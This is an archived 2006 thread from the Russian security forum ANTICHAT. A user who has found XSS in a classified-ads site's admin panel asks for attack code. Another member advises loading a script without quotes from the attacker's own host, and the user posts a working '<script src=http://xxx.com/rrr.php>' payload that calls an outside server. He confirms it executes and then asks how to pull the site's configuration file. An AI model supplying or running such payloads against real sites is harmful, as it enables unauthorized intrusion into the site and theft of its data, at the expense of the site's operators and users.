HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
Перезагрузить страницу Есть Xss в админке. дайте код
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Есть Xss в админке. дайте код
  #1  
Старый 10.07.2006, 00:48
Xover
Новичок
Регистрация: 17.09.2005
Сообщений: 9
Провел на форуме:
57784

Репутация: 0
Отправить сообщение для Xover с помощью ICQ
По умолчанию Есть Xss в админке. дайте код
Нашел Xss в админке(доска объявлений с премодерированием).

Не проходят только символы " ' \

Авторизация через сессии. Что можно сделать с помощью яваскрипта?

Спс.
 
Ответить с цитированием

  #2  
Старый 10.07.2006, 08:19
SMiX
Участник форума
Регистрация: 25.07.2005
Сообщений: 246
Провел на форуме:
457850

Репутация: 174
По умолчанию
Да. <script src=абсолютный_адрес_без_кав чек></script>
Скрипт должен находиться где-то на твоем хосте
 
Ответить с цитированием

  #3  
Старый 10.07.2006, 22:41
Xover
Новичок
Регистрация: 17.09.2005
Сообщений: 9
Провел на форуме:
57784

Репутация: 0
Отправить сообщение для Xover с помощью ICQ
По умолчанию
Спасибо, будем пробовать


<script src=http://xxx.com/rrr.php></script> - вот так нет реакции, там можно PHP подключать или только яваскрипт?

---------------
упс, код выполняется, идем дальше.
Последний раз редактировалось Xover; 10.07.2006 в 22:58..
 
Ответить с цитированием

  #4  
Старый 10.07.2006, 23:55
Xover
Новичок
Регистрация: 17.09.2005
Сообщений: 9
Провел на форуме:
57784

Репутация: 0
Отправить сообщение для Xover с помощью ICQ
По умолчанию
Такой вопрос:

Как заставить код выполняться на их сервере а не на моем?

Нужно выкачать конфигурационный файл, но скрипт выполняется у меня и ищет файл у меня на хосте.
Последний раз редактировалось Xover; 11.07.2006 в 02:08..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Подборка уязвимостей phpBB -=ka$at1k=- Уязвимости CMS / форумов 3 02.07.2006 15:26



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ